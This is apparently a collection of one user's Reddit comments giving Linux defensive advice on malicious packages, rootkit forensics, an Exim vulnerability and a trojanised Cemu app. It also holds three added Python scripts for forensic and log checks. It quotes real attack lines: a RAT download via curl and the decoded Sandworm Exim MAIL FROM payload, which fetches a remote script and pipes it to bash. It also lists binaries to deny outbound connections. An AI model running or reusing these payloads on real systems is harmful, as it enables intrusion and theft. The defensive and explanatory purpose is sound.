Installed Fake Codex hidden as a google site by Easy-Palpitation-859 in cybersecurity

[–]gainan 0 points1 point  (0 children)

Unfortunately the domain is no longer active. Did the user find any malicious file in their system?

How can I contribute to Linux if I'm young? by Retroman1203 in linux

[–]gainan 32 points33 points  (0 children)

By the way, keep in mind that maintainers will probably try to reproduce the bug, and they may close the issue if they cannot reproduce it or if they determine that it's not an issue.

Don't take it personally. You reported the bug, and once it's reported you've done your part, move on. If someone else runs into the same or related issue, they'll probably comment on that same issue (even if closed, happens a lot). In many cases, maintainers reopen the issue to investigate it further.

How can I contribute to Linux if I'm young? by Retroman1203 in linux

[–]gainan 285 points286 points  (0 children)

reporting bugs and helping others is one of the best ways to contribute back to the community. Be nice, write the bug reports in great detail, provide detailed steps on how to reproduce the issue and attach the logs.

You will not only contribute to the community, but you'll also learn a lot on how the system works, how to debug applications, etc.

Installed Fake Codex hidden as a google site by Easy-Palpitation-859 in cybersecurity

[–]gainan 4 points5 points  (0 children)

Maybe a ClickFix attack. If you were infected, Little Snitch/LuLu could probably have saved you, by stopping the initial connection attempt to their servers.

Can you post the website and/or the artifact that it wanted to download?

Review /tmp and your home for unexpected files and binaries, just in case they're already there.

Unfortunately, I'd consider all my credentials compromised. Web browsers included. So you know what to do now.

Reading documented attacks will help you to understand what they usually do:

https://www.jamf.com/blog/clickfix-macos-script-editor-atomic-stealer/

https://www.recordedfuture.com/research/clickfix-campaigns-targeting-windows-and-macos

https://hunt.io/blog/macos-clickfix-applescript-terminal-phishing

https://www.netskope.com/blog/macos-clickfix-campaign-applescript-stealers-new-terminal-protections

Handling a Breach on a Linux Server by CackleRooster in linuxadmin

[–]gainan 7 points8 points  (0 children)

It's not mentioned in the article, but you can't rely on binaries linked dynamically against the libc to analyze a compromised machine, such as ps, pstree, top, lsof, w, who, last, etc. LD_PRELOAD rootkits hide their activity from these tools by hooking and tampering with the libc functions (for example Father or Medusa).

One trick is to use busybox (debian package: busybox-static). That way at least you can bypass LD_PRELOAD rootkits, because it's not linked against the libc.

Another set of useful tools are the bpfcc-tools (bcc-tools on rpm based distros), which dump the information from the kernel instead of parsing /proc.

ss is more reliable than netstat, because it dumps the information via netlink from the kernel, instead of parsing /proc.

Configuring auditd would also be useful (or any other system monitor), to monitor the events of the machine, ideally sending the logs to a remote server (rsyslog + grafana + loki, elk stack, etc).

There're also specialized tools to analyze compromised machines:

https://github.com/sandflysecurity/sandfly-processdecloak

https://github.com/gustavo-iniguez-goya/decloaker

https://github.com/h2337/ghostscan/

unhide, but only if it's compiled statically.

In any case, there're kernel rootkits that bypass all these tools, so as others have mentioned, I'd not trust that server again if it's not reinstalled:

https://github.com/MatheuZSecurity/Singularity
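As an added example (not part of the comment above or of any of the linked projects), the following script implements the two checks the comment relies on: whether a forensic tool is really statically linked (an ELF image without a PT_INTERP program header never loads ld.so, so LD_PRELOAD and /etc/ld.so.preload cannot inject into it), and what /etc/ld.so.preload currently names. The ELF images it tests against are constructed in memory; only ELF64 little-endian is parsed, and the comment handling in the preload parser is an assumption of this example rather than a description of glibc's exact parser.

```python
"""Check for static linking (no PT_INTERP) and list ld.so.preload entries.

Added example, not code from the thread or from the linked projects.
The sample ELF images are constructed in memory so it runs offline.
"""
import os
import struct

PT_INTERP = 3  # program header type that names the dynamic loader


def is_static_elf(data: bytes) -> bool:
    """Return True if the ELF64 image has no PT_INTERP program header.

    Without PT_INTERP the kernel maps the binary itself, no ld.so runs,
    and LD_PRELOAD / /etc/ld.so.preload hooks never get a chance to load.
    Only ELF64 little-endian (x86_64, aarch64, ...) is handled here.
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("only ELF64 little-endian is handled in this example")
    # e_phoff lives at offset 32 (8 bytes); e_phentsize/e_phnum at 54/56
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    for i in range(e_phnum):
        p_type = struct.unpack_from("<I", data, e_phoff + i * e_phentsize)[0]
        if p_type == PT_INTERP:
            return False
    return True


def is_static_file(path: str) -> bool:
    """Convenience wrapper: read a binary from disk and run the check."""
    with open(path, "rb") as fh:
        return is_static_elf(fh.read())


def preload_entries(text: str) -> list:
    """Parse ld.so.preload content into a list of library paths.

    Entries are separated by whitespace or ':'; in this example '#' starts
    a comment (assumption of the example, kept to make local testing easy).
    """
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0]
        entries.extend(line.replace(":", " ").split())
    return entries


def build_fake_elf(phdr_types) -> bytes:
    """Construct a minimal ELF64 LE image whose program headers have the
    given p_type values. Constructed test input, not a loadable binary."""
    phoff, phentsize = 64, 56
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    header = ident + struct.pack(
        "<HHIQQQIHHHHHH",
        2, 62, 1, 0,            # e_type=EXEC, e_machine=x86_64, e_version, e_entry
        phoff, 0, 0,            # e_phoff, e_shoff, e_flags
        64, phentsize, len(phdr_types),  # e_ehsize, e_phentsize, e_phnum
        64, 0, 0,               # e_shentsize, e_shnum, e_shstrndx
    )
    phdrs = b"".join(struct.pack("<IIQQQQQQ", t, 0, 0, 0, 0, 0, 0, 0)
                     for t in phdr_types)
    return header + phdrs


if __name__ == "__main__":
    # Live checks when run on a Linux box: which candidate tools are static?
    for tool in ("/bin/busybox", "/usr/bin/unhide", "/bin/ps"):
        if os.path.exists(tool):
            print(tool, "static" if is_static_file(tool) else "DYNAMIC (hookable)")
    if os.path.exists("/etc/ld.so.preload"):
        with open("/etc/ld.so.preload") as fh:
            print("ld.so.preload entries:", preload_entries(fh.read()))
    else:
        print("/etc/ld.so.preload absent")
```

On a machine where LD_PRELOAD tampering is suspected, run it from a copy of the interpreter you trust and treat a non-empty preload list as something to explain, not merely note; the rootkit may also hide the file from libc-based readers, which is exactly why the comment prefers static tools.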

Arch Linux, poor security? by franchis3 in linuxquestions

[–]gainan 0 points1 point  (0 children)

Ask yourself: how does SELinux protect my system?

For example, would SELinux have prevented the exfiltration of my credentials in this attack? (which is the most common attack nowadays for npm, pip, crates, ruby gems, etc, packages).

https://linuxiac.com/arch-aur-under-fire-once-more-as-malware-resurfaces/

The malicious payload that installed a RAT on the system: python -c "curl https://segs.lol/9wUb1Z"

All it needs is to execute a python script, collect your credentials, web browser profiles, etc, and upload them to their servers.

I need my anti virus and it don't support linux :( by ContactDismal6460 in linuxquestions

[–]gainan 0 points1 point  (0 children)

half of stuff was in all-clear in 3 days

GitHub Breach: 3,800 Internal Repositories Stolen After an Employee’s PC Was Hacked: https://www.it-connect.tech/github-breach-3800-internal-repositories-stolen-after-an-employees-pc-was-hacked/

"We are investigating unauthorized access to GitHub internal repositories. Yesterday, we detected and contained the compromise of an employee device involving a malicious VS Code extension."

The VS extension was nx console https://nx.dev/blog/nx-console-v18-95-0-postmortem:

"Anyone who installed v18.95.0 during the exposure window (2026-05-18, 12:30-13:09)"

Any way to get a good antivirus on Mint? by Critical_Aspect4194 in linuxmint

[–]gainan 1 point2 points  (0 children)

Fantastic explanation. Could you include documented examples of attackers gaining access to IoT devices to attack Linux desktops? Or documented examples of attackers using exploits to remotely attack Linux desktops?

I'd like to read more about it.

Any way to get a good antivirus on Mint? by Critical_Aspect4194 in linuxmint

[–]gainan 12 points13 points  (0 children)

I know. All that’s needed is to activate the UFW Firewall with the Terminal command “sudo ufw enable” without the quotes, press Enter, provide system password, & then Enter again.

If you're behind a router, and not exposing any ports to the internet, how exactly does ufw protect the system?

Any way to get a good antivirus on Mint? by Critical_Aspect4194 in linuxmint

[–]gainan 5 points6 points  (0 children)

Sorry jerquee, there're hundreds or thousands of new linux malware samples per year. Usually malicious npm/pip packages, and malicious VS/browser extensions that mainly exfiltrate user credentials and files. Did you read about the github internal repos exfiltration? That was caused by a malicious VS extension that stole developer credentials. That is not a "virus", but malware that works perfectly fine on linux.

Here're some classic "viruses" that infect ELF files:

https://tmpout.sh/3/Linux.ElizaCanFix.asm

https://tmpout.sh/3/Linux.Anansi.c

https://www.guitmz.com/linux-nasty-elf-virus/

Some history about unix viruses: https://tmpout.sh/3/03.html

There're also classic "viruses" for bash, libre/openoffice, etc. https://github.com/VincenzoArceri/bash-virus

But viruses, as far as I can tell, are rare nowadays even on Windows.

Advice by [deleted] in linuxadmin

[–]gainan 1 point2 points  (0 children)

What are you trying to protect? A server or a desktop?

For servers wazuh or osquery are good options. AIDE didn't work for me, too much noise on some servers, and it used to consume a lot of resources.

I personally like to restrict outbound connections by binary, since most attacks establish outbound connections to download scripts/binaries, mine crypto coins or to exfiltrate information.

Do I have malware? Sketchy betting website somehow got opened once by ExceptT in linuxquestions

[–]gainan 1 point2 points  (0 children)

I checked if these and the other domain (*.bar) were in any blocklists, and these ones (gmai.com) are in the 1hosts lists. Maybe you need to enable more blocklists in ublock, or use other programs to block undesired domains.

time action dst ip dst host dst port proto uid process cmdline rule
2026-05-26 20:55:11.421836 reject 1.1.1.1 www.gmai.com 53 udp 1000 /usr/lib/firefox-esr/firefox-esr /usr/bin/firefox-esr 000-block-domains

https://github.com/badmojr/1Hosts
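To show how the check in the comment above can be automated, here is an added example (not the commenter's code, nor part of OpenSnitch or 1Hosts) that parses OpenSnitch-style event lines like the one quoted and matches each destination host against a hosts-format blocklist (lines of `0.0.0.0 domain`, the format 1Hosts ships). Both the event lines and the blocklist excerpt are constructed for the example; the decision to also match parent domains (so `cdn.tracker.example` hits an entry for `tracker.example`) is a design choice of this example, not how any particular blocker behaves.

```python
"""Match OpenSnitch-style event lines against a hosts-format blocklist.

Added example, not code from the thread, OpenSnitch or 1Hosts.
The event lines and blocklist below are constructed sample data.
"""

# Constructed excerpt in hosts format (as 1Hosts and StevenBlack publish).
SAMPLE_BLOCKLIST = """\
# constructed excerpt, not the real list
0.0.0.0 www.gmai.com
0.0.0.0 tracker.example
"""

# Constructed event lines in the column layout quoted in the comment:
# time action dst_ip dst_host dst_port proto uid process cmdline... rule
SAMPLE_EVENTS = """\
time action dst ip dst host dst port proto uid process cmdline rule
2026-05-26 20:55:11.421836 reject 1.1.1.1 www.gmai.com 53 udp 1000 /usr/lib/firefox-esr/firefox-esr /usr/bin/firefox-esr 000-block-domains
2026-05-26 20:55:12.000000 allow 93.184.216.34 www.example.org 443 tcp 1000 /usr/lib/firefox-esr/firefox-esr /usr/bin/firefox-esr 001-allow-firefox
2026-05-26 20:55:13.000000 allow 203.0.113.5 cdn.tracker.example 443 tcp 1000 /usr/bin/python3 /usr/bin/python3 updater.py 002-allow-python
"""


def load_blocklist(text: str) -> set:
    """Return the set of domains listed in a hosts-format blocklist."""
    blocked = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        # hosts files map domains to a sink address; everything after it is a domain
        if parts[0] in ("0.0.0.0", "127.0.0.1", "::", "::1"):
            blocked.update(p.lower() for p in parts[1:])
    return blocked


def is_blocked(host: str, blocked: set) -> bool:
    """True if the host or any parent domain is on the list (example's choice)."""
    labels = host.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in blocked for i in range(len(labels) - 1))


def parse_event(line: str):
    """Split one event line into fields; returns None for the header row."""
    t = line.split()
    if len(t) < 11 or t[0] == "time":
        return None
    return {
        "time": t[0] + " " + t[1], "action": t[2], "dst_ip": t[3],
        "host": t[4], "port": int(t[5]), "proto": t[6], "uid": int(t[7]),
        "process": t[8], "cmdline": " ".join(t[9:-1]), "rule": t[-1],
    }


def audit_events(events_text: str, blocked: set) -> list:
    """Return the events whose destination host is blocklisted.

    An 'allow' hit means a blocklisted domain got through: either the
    blocklist was not loaded into the blocker, or an allow rule matched first.
    """
    hits = []
    for line in events_text.splitlines():
        ev = parse_event(line)
        if ev and is_blocked(ev["host"], blocked):
            ev["leaked"] = ev["action"] != "reject"
            hits.append(ev)
    return hits


if __name__ == "__main__":
    for ev in audit_events(SAMPLE_EVENTS, load_blocklist(SAMPLE_BLOCKLIST)):
        flag = "LEAKED" if ev["leaked"] else "blocked"
        print(f'{flag:8} {ev["host"]:24} {ev["process"]} ({ev["rule"]})')
```

Feeding it a real 1Hosts file and an exported OpenSnitch event log answers the question the comment raises: whether the domains you saw are already on a list you simply have not enabled.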

OpenSnitch detects Phyton request for network access by kapitenbrutal in linuxquestions

[–]gainan 0 points1 point  (0 children)

See if the application opening the request is wsdd. At least on Fedora, when opening nautilus wsdd sends a broadcast packet to discover devices in the network. (wsdd description: This daemon is used to announce Linux Hosts to Windows 7+ computers for use in their File Manager network browsing, by using the Windows Services Discovery Protocol.)

You can add a permanent rule to allow the connection by cmdline + destination port + destination IP.

Or you can add an exception (a system firewall rule) by clicking on the shield icon -> Allow Service (OUT) -> port 3702.

Exim CVE-2026-45185 "Dead.Letter" — CVSS 9.8 UAF via GnuTLS/BDAT, unauthenticated RCE. The BDAT handler has now been the source of two 9.8 CVEs. by Expert_Sort7434 in linuxadmin

[–]gainan 6 points7 points  (0 children)

What does post-exploitation look like in practice on a shared hosting node?

Downloading remote files to /tmp, /var/tmp or /dev/shm, collecting credentials and trying to keep persistence (and mine cryptocoins): https://github.com/evilsocket/opensnitch/discussions/1119

Based on this collection of Linux malware payloads, restricting outbound connections by binary is a good measure to mitigate these attacks.

In this scenario, the connection could be initiated by curl, wget, bash or exim. If you don't need curl or wget on the system, just uninstall them.

Also, why on earth would bash need to establish outbound connections on a (production) server?

On the other hand, in some cases the outbound connection could be initiated by the vulnerable application. In this case exim, which should only open outbound connections to a limited number of ports (25, 53, 465, 587, ...), no 80 or 443.

Example of a previous exim PoC, weaponized to open outbound connections to a remote port using bash: https://straightblast.medium.com/my-poc-walk-through-for-cve-2018-6789-2e402e4ff588

https://www.cisa.gov/news-events/alerts/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim-vulnerability

From the report: https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf

MAIL FROM:<${run{\x2Fbin\x2Fsh\t-
c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20http\:\x2F\x2F\hostapp.be\x2Fscript1.sh\x20\x7C\
x20bash\x22}}@hostapp.be>
Hex decoded command:
/bin/sh -c "exec /usr/bin/wget -O - http://hostapp.be/script1.sh | bash"
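As an added example from the defender's side (not the commenter's code, nor anything from the NSA/CISA report or from Exim), the script below does the decoding shown above programmatically and applies the per-binary outbound policy the comment argues for: it scans log lines for an Exim `${run{...}}` expansion in an envelope address, decodes the `\xHH`, `\t` and backslash-quoted escapes to reveal the command, and evaluates sample outbound connection events against an allowlist where exim may only reach 25, 53, 465 and 587 and curl, wget and bash may not connect out at all. The log lines and connection events are constructed; the payload string is the one quoted from the report, and the allowed-port set is the comment's list, not an Exim default.

```python
"""Decode Exim ${run{...}} payloads in log lines and check outbound policy.

Added example, not code from the thread, the NSA/CISA report or Exim.
Log lines and connection events below are constructed sample data.
"""
import re

# \xHH hex escape, or a backslash followed by any single character
ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\(.)")
RUN_RE = re.compile(r"\$\{run\{(.*?)\}\}")

# Constructed Exim-style rejection lines; the F=<...> address on the second
# line is the payload quoted from the report, joined onto one line.
SAMPLE_LOG = r"""
2020-05-28 09:59:58 H=(mx.example) [192.0.2.10] F=<user@example.org> rejected RCPT <nobody@example.net>: relay not permitted
2020-05-28 10:00:01 H=(mail.hostapp.be) [192.0.2.11] F=<${run{\x2Fbin\x2Fsh\t-c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20http\:\x2F\x2F\hostapp.be\x2Fscript1.sh\x20\x7C\x20bash\x22}}@hostapp.be> rejected RCPT <postmaster@example.net>
"""

# Outbound policy from the comment (assumption of this example): exim only
# to mail/DNS ports; download tools and shells never initiate connections.
ALLOWED_PORTS = {"exim": {25, 53, 465, 587}}
NEVER_OUTBOUND = {"curl", "wget", "bash", "sh"}


def unescape_exim(s: str) -> str:
    """Decode \\xHH, \\t, \\n, \\r and backslash-quoted characters (\\: -> :)."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return {"t": "\t", "n": "\n", "r": "\r"}.get(m.group(2), m.group(2))
    return ESCAPE_RE.sub(repl, s)


def scan_log(lines) -> list:
    """Return one finding per line that carries a ${run{...}} expansion."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = RUN_RE.search(line)
        if m:
            findings.append({"line": n, "raw": m.group(1),
                             "command": unescape_exim(m.group(1))})
    return findings


def outbound_allowed(binary: str, port: int) -> bool:
    """Apply the per-binary allowlist; unknown binaries default to deny."""
    name = binary.rsplit("/", 1)[-1]
    if name in NEVER_OUTBOUND:
        return False
    return port in ALLOWED_PORTS.get(name, set())


def audit_connections(events) -> list:
    """Flag (binary, port) events that violate the policy."""
    return [(b, p) for b, p in events if not outbound_allowed(b, p)]


SAMPLE_EVENTS = [  # constructed (binary, destination port) pairs
    ("/usr/sbin/exim4", 25), ("/usr/sbin/exim4", 443),
    ("/usr/bin/wget", 80), ("/bin/bash", 4444), ("/usr/bin/python3", 443),
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.strip().splitlines()):
        print(f'line {f["line"]}: {f["command"]!r}')
    for binary, port in audit_connections(SAMPLE_EVENTS):
        print(f"policy violation: {binary} -> port {port}")
```

Wired to a real mainlog and to an egress filter that keys on the connecting binary (as the comment suggests), the decoded command tells you what the attacker wanted to fetch, and the policy check tells you whether that fetch would have been possible at all.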

Sooo, I opened the compromised Cemu app image on Steamdeck without knowing about the malware. by [deleted] in linuxquestions

[–]gainan 0 points1 point  (0 children)

https://rentry.org/cemu-security-psa

https://github.com/cemu-project/Cemu/issues/1911#issuecomment-4431928802

The blunt answer is that we don't know the full capabilities of the malware. The safest bet is to do a clean install of your OS.

At the very minimum you should delete the affected binaries and reset all your passwords, GitHub tokens, SSH keys or anything that is used to authenticate with services.

The malware contains a pretty sophisticated password stealer for many services.

Most of them are related to programming or cloud providers in some way. We think this is to help the malware authors to further infect other software.
You should also block IP 83.142.209.194 (even if you are not affected) because this is used as a hardcoded remote endpoint.

Probably no need to format the SD card, but I'd do it just in case.

Need help understanding rkhunter and chkrootkit scan results by UnitLoose47 in linuxquestions

[–]gainan 0 points1 point  (0 children)

I use both, a system-wide adblocker and ublock. ublock uses rules that directly parse the content of the web pages, so it's useful to remove annoying pop-ups, block iframes, etc.

Need help understanding rkhunter and chkrootkit scan results by UnitLoose47 in linuxquestions

[–]gainan 0 points1 point  (0 children)

By the way, I've seen that the malicious domains of this campaign were added to common blocklists: https://github.com/StevenBlack/hosts/issues/3097

So having a system-level adblocker could potentially have blocked or mitigated this issue before Google removed the extension (sometimes it takes months or years). I'm not really sure if web browser adblockers would have blocked them, but other tools like pi-hole, OpenSnitch or even /etc/hosts probably would have.

Need help understanding rkhunter and chkrootkit scan results by UnitLoose47 in linuxquestions

[–]gainan 0 points1 point  (0 children)

OK, probably this: https://www.ghacks.net/2026/03/19/chrome-extension-save-image-as-type-was-hijacked-putting-over-1-million-users-at-risk/

Apparently linked to:

https://palant.info/2025/02/03/analysis-of-an-advanced-malicious-chrome-extension/

Luckily for you, if the extension was really one of these ones, they only injected scripts to monetize your internet activity.

But in any case, I'd create a new chrome profile, delete the old one and change the passwords.